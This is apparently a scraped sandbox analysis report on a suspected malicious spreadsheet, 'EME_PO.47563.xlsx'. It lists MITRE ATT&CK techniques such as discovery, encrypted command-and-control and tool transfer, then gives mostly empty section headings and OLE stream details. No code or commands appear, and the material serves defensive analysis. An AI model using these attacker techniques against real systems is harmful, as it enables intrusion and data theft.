Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report EME_PO.47563.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "EME_PO.47563.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General